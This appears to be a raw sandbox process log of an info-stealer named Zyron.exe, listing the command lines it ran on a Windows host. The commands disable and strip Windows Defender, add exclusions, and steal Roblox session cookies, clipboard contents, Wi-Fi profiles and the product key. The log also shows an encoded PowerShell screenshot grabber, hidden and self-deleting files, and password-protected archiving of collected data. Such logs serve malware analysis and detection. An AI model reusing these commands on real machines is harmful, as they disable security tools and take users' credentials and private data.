C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8666.tmp" "c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\CSCD8E5FF1D5B2B4571A40C33BB0E7D381.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\j6XOA.zip" *"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\j6XOA.zip" *

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exbwlwpg\exbwlwpg.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73A4.tmp" "c:\Users\Admin\AppData\Local\Temp\exbwlwpg\CSC143BBAF1AEDE42BF8B1F899AB24C6AFB.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *

\??\c:\users\admin\appdata\local\temp\_mei50802\rar.exe 

c:\users\admin\appdata\local\temp\_mei50802\rar.exe  a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

